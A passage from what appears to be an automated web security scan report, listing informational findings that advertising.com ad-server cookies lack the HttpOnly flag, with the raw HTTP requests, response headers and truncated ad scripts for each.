Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=21477175&rk1=64080944&rk2=1316239421.979&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054107.753542.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:02:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=22455; var kadwidth=728; var kadheight=90; var kadNetwork=661; var kadtype=1; <\/script> <script type="t
...[SNIP]...

12.141. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=33923723&rk1=62964858&rk2=1316239321.3&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:00:38 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:00:37 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:00:38 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

12.142. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=29230852&rk1=58438691&rk2=1316239663.676&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:18 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

12.143. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=33175415&rk1=41056854&rk2=1316239356.012&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:01:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:01:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:01:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

12.144. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:02:51 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:02:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:02:51 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

12.145. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=48939657&rk1=13158778&rk2=1316239703.749&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1054108.753543.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:06:57 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 514
Date: Sat, 17 Sep 2011 01:06:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:06:57 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script type="text\/javascript"> var pubId=27330; var siteId=27331; var kadId=23101; var kadwidth=160; var kadheight=600; var kadNetwork=661; var kadtype=1; <\/script> <script type="
...[SNIP]...

12.146. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:04:09 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Length: 1059
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:04:09 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

12.147. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=55474788&rk1=67672039&rk2=1316239581.661&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:05:00 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:59 GMT
Content-Length: 1061
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:05:00 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

12.148. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=40965670&rk1=31203508&rk2=1316239503.237&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:03:37 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:03:37 GMT
Content-Length: 1059
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
